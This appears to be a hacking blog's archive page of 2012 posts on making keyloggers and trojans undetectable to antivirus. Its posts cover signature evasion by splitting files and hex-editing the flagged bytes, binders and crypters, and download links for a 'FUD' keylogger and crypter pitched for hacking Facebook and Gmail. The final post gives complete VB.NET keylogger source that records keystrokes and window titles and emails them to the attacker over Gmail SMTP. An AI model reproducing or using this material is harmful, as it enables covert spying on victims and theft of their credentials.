Showing posts with label Fud crypters. Show all posts
Showing posts with label Fud crypters. Show all posts

Monday, December 17, 2012

|| How to fud your keylogger/spyware to bypass antivirus detection [video] ||

i receive a request from few of you so i decided to make a keylogger FUDding video tut hope u all like it

All required toolkit:

video on youtube: http://youtu.be/rlv6Lad3nmY


SCANNING {{RESULT}}



only for educational purpose..

Monday, December 17, 2012 by Shreyash Tiwari · 0

Saturday, August 4, 2012

Bind (Trojans/Keyloggers/Viruses) with Binders | bind in files

What is a Binder?

 A Binder is a software used to bind or combine to or more files under one name and extension, The files to be binded can have any extension or icon, Its all up to you and you have the choice to select the name, icon and various attributes of binded file, The Binded files can be even worse when they are crypted, because Bintext would not be able to find it and at the same time it could also bypass antivirus detection then you are almost guaranteed to be infected.

Bridges the Gap between XML and Code (C++,C#,Java,VB6,VB.Net). Generates a class library based on an XML Schema (XSD, XDR or DTD). The resulting library makes it simple to read and write XML documents programmatically. Drastically cutting time spent developing and testing. Because the class library is strongly typed you can also make use of intelligence. The library forces compliance to the schema resulting in valid XML every time. Simple words it converts your code and forms into an executable program.



   Why Hacker's use Binder?

 It’s simple. They bind the virus with another clean for example (.exe) to make the virus undetected to anti-virus software. Many binders has extra features like add bytes, change icons, etc. to make them more undetected. You can go to stuff page and download the binder to see how it’s work. Of course is detected from some anti-virus use it for education purpose.

nathen binder,nbinder,flaming binder,sadaf binder,hotfusion binder

Saturday, August 4, 2012 by Shreyash Tiwari · 0

Monday, May 7, 2012

How to Fud Trojans/keyloggers with Hex Editing &File Splitting method | Every server is undetectable




hey guys this is the best way to FUD your spyware i used this method and i found it is 100% working this tut is not generated by me but i try this method so i like to share this with all of my blog visitors..!!

tools required :

1. any antivirus- avast is used in this TuT

2. file sprinle: http://www.dekabyte.com/filesplitter/download.html

3. Hex editor: http://www.hhdsoftware.com/free-hex-editor


 grab the server you want to edit mine is going to be a Spyrex keylogger server.

Before we begin turn AntiVirus off.
You result may vary on AntiVirus your using. 


Now place you server in a folder I recommend naming it A trust me on this. Now my server name is test.exe.

Okay now once you have placed the server in a file lets scan it.
And
 it got caught :D


Ok now where to start open The File Splitter and Calc.exe to split the  file.
In
the file splitter browse to the server you want to split and choose 
Custom size. Now it tells me that this server is exactly 53,495 bytes 
and I want to split it into 4 pieces. So I go to Calc and divide it by 4
now place the number you got after dividing it and place it in the 
splitter custom size box like I have at the bottom. Now click on Split.





Now you should get the files in the same directory like I have below.



Now scan each of them to figure out witch file we have to split again.

 Now once you have figured it out make a new folder named the part 
number that was detected now I got part 3 so I'm gonna make a new folder
named 3 . 



Now I
hope you didn't close file splitter if so reopen it and browse to 
test.exe.3 to split and change the output folder to 3 like I have in the
picture below. We are also going to split this file into 4 pieces again
so open up Calc and divide by 4.
I made a drawing on this if your confused 


Now you should have this inside folder named 3.




Now
scan each file again to figure out witch file we need to split but also
be aware of how small the file is getting. Once you figure out witch 
file needs splitting make a new folder with the parts name. I got part 
test.exe.3.3 so I am going to make a new folder and name it 3.




Now
once you made new folder named 3 open up file splitter and browse to 
the file that got detected mine was test.exe.3.3 and pick the output 
directory to the folder we just made witch was the folder named 3.



Now
browse to the new folder and scan the new files we split. As you can 
see test.exe.3.3.4 was detected so I'm gonna make a new folder and name 
it 4.


Now in file splitter pick the file that got detected witch was test.exe.3.3.4 and choose the new folder we made named 4.




 Now lets scan the new files and see witch got detected ocne we find it open it up with the HEX editor and see if its still to big to figure out what we need to change.





Ok so it's test.3.3.4.1 that we need to edit do open it up with your favorite hex editor or use the one I provided earlier. Once you open it it will look something like this.


Now
the virus signature is in here don't get scared its not that hard now 
my method of figuring it is looking for something that stands out or 
guesssing. All you really have to do is change a letter from capital to a
lower case one now what worked for me was changing D to a lower case 
from the word DLLHOOKSTRUCT. 



Now save it exit and scan it it should be undectable.


  
Congratz now its FUD now all you need to do it compile it and scan it one more time and run it to test.

Now compiling I will show you one example and you can figure out the rest by your own.



Now you see the splitter icon inside your folder click on it and it will recompile the file.



Now


once you made that file copy it and go back one directory and past it 
then it will ask you to replace it click yes and keep doing this till 
you go back to first directory. And your done.
you are finished :D i hope you like this tut

Monday, May 7, 2012 by Shreyash Tiwari · 2

Friday, March 23, 2012

Fud keyloggers Rin logger | Free download | Hack facebook,gmail,yahoo etc

READ ABOUT KEYLOGGERS: From here..??

{{turn off! your Antivirus}} Keylogger will be detected !!!

Rinlogger [keylogger + Antilogger ] 100% FUD


                                                                 







           


  • Rin-logger download: here   link updated: 20/10/14

  • password:

Friday, March 23, 2012 by Shreyash Tiwari · 0

Wednesday, March 14, 2012

|| Bypass Antivirus detection using Fud crypter || (keyloggers/virus/trojans) are fully undetectable ||

                


so today you will learn what is FUD crypter? FUD is acronym for fully undetectable.It is a software that can be used to encrypt your exe files. 


USES OF FUD CRYPTER? 
FUD crypters can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses & firewallscrypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.


How Does FUD Crypter Work?  


The Crypter takes the original binary file of you exe and applies many encryption on it and stores on the end of file(EOF).So a new crypted executable file is created.
Original Exe Crypted Exe
001————- 010                                      101————-110
100|Original File|000->  Cryptor  ->010|Original File|110
010————- 111                                        110————-010
The new exe is not detected by antiviruses because its code is scrambled by the crypter.When executed the new .exe file decrypts the binary file into small the data small pieces at a time and injects them into another already existing process or a new empty one, OR it drops the code into multiple chunks in alternative data streams(not scanned by most a/v) then executes it as a .txt or .mp3 file.



      

Fud crypter:   download here  [184 KB]  


NOTES: 

1) .netframework should  be installed in your system before running the crypter

2) Do not Run your crypter in virustotal.com otherwise it does not remain FUD this is the same mistake made by many of noobs they run their crypters in virus scan websites and  the crypter stop working and detected by antiviruses.

Wednesday, March 14, 2012 by Shreyash Tiwari · 0

Tuesday, February 28, 2012

How to Fud keylogger in visual basic | Make your own logger

         


here is a new trick known as,
 how to fud keylogger in visual basic. check steps ..!!


  • 1. nothing required  first download visual basic- DOWNLOAD
  • 2.  Run Visual Basic

In Tab click File > New Project Windows Application > "Keylogger Builder" > Click Ok


                      




  • 3. STEP


Change the following from the Properties of Form1:

FormBorderStyle = FixedSingle
MaximizeBox = False
MinimizeBox = False
Show Icon = False
StartPosition = CenterScreen
Text = Keylogger Builder
from the Toolbox add:
TextBox1 - The GMail Username textbox
Textbox2 - The Gmail Password textbox
Button1 - The Build button, Change text to: Build
Label1 - Change text to: Gmail Username
Label2 - Change text to: Gmail Password


  • 4. STEP


Now when you add all these, on top of code add:

Code:
Imports System.IO
Now under Public Class Form1 add following code, that would be strings:

Code:
Dim stub, text1, text2 As String
Const FileSplit = "@keylogger@"
Now when you done with that, just simply double click Button1 and add:
Code:
text1 = TextBox1.Text
text2 = TextBox2.Text
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
If File.Exists("Server.exe") Then
My.Computer.FileSystem.DeleteFile("Server.exe")
End If
FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & FileSplit & text1 & FileSplit & text2 & FileSplit)
FileClose(1)
MsgBox("The Server.exe is builded!")
Now you got your builder and now lets move to Stub.

  • 5. STEP

Run Visual Basic
In Tab click File > New Project
Windows Application > "Stub" > Click Ok

  • 6. STEP


Change the following from the Properties of Form1:

FormBorderStyle = FixedToolWindow
StartPosition = CenterScreen
Text = (no text)
WindowsState = Minimized


Timer1 Interval = 900000
Timer2 Interval = 100
Timer3 Interval = 100

  • 7. STEP


Now when you add all these, on top of code add:

Code:
Imports System.IO
Imports System.Net.Mail
Now under Public Class Form1 add following code, that would be strings:

Code:
Dim options(), text1, text2 As String
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim result As Integer
Const FileSplit = "@keylogger@"
Now double click Timer1 and write following code:

Code:
Dim MailSetup As New MailMessage
MailSetup.Subject = My.Computer.Name & ":"
MailSetup.To.Add(TextBox2.Text)
MailSetup.From = New MailAddress(TextBox2.Text)
MailSetup.Body = TextBox1.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTP.Send(MailSetup)
TextBox1.Clear()
And add this as Function to source code:

DOWNLOAD HOW TO ADD FUNCTION IF YOU DONT KNOW:


Code:
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
Dim strin As String = Nothing

Private Function GetActiveWindowTitle() As String
Dim MyStr As String
MyStr = New String(Chr(0), 100)
GetWindowText(GetForegroundWindow, MyStr, 100)
MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
Return MyStr
End Function
Now double click Timer2 to get names of active windows:

Code:
If strin <> GetActiveWindowTitle() Then
TextBox1.Text = TextBox1.Text + vbNewLine & "[" & GetActiveWindowTitle() & "]:" + vbNewLine
strin = GetActiveWindowTitle()
End If
Now double click Form1 and write following code:

Code:
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
text1 = Space(LOF(1))
text2 = Space(LOF(1))
FileGet(1, text1)
FileGet(1, text2)
FileClose(1)
options = Split(text1, FileSplit)
TextBox2.Text = options(1)
TextBox3.Text = options(2)
Timer1.Start()
Timer2.Start()
Now double click Timer3 and past code:

Code:
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If next
8. done !!!!

Tuesday, February 28, 2012 by Shreyash Tiwari · 0

All Rights Reserved TeCh ZoNe | Blogger Template by Bloggermint
back to top